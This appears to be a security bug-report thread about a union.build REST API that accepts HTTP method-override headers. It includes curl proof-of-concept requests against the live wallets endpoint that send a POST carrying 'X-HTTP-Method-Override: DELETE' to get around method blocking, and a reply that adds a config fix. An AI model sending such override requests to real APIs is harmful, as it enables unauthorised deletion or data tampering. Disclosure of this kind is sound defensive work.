Bug: HTTP Method Override Works on API

[0xNexar]

HTTP Method Override Vulnerability

Summary

API accepts HTTP Method Override headers, allowing bypass of method-based security controls.

Affected System

• API: https://api.dashboard.union.build/rest/v1/
• Endpoints: /wallets, /user_achievements, /chains, /user_points

Proof of Concept

Normal DELETE (blocked):
curl -X DELETE "https://api.dashboard.union.build/rest/v1/wallets" -H "apikey: [KEY]"

Returns: 405 Method Not Allowed

Override DELETE (processed):
curl -X POST "https://api.dashboard.union.build/rest/v1/wallets"
-H "X-HTTP-Method-Override: DELETE"
-H "apikey: [KEY]"

Returns: 400 Bad Request (server processes override)

Impact

• Bypasses HTTP method-based security controls
• Could affect dashboard (XP/leaderboard manipulation attempts)
• Multiple override headers work: X-HTTP-Method-Override, X-Method-Override, _method

Evidence

Response code difference (405 vs 400) proves server processes override methods instead of blocking them.

[Whizzy6868]

a good out put here

[vdRobin]

in /workspaces/union/mpc/edge/supabase/config.toml

# PostgREST configuration - Disable HTTP method override to prevent security exploit
[api.postgrest]
no_override = true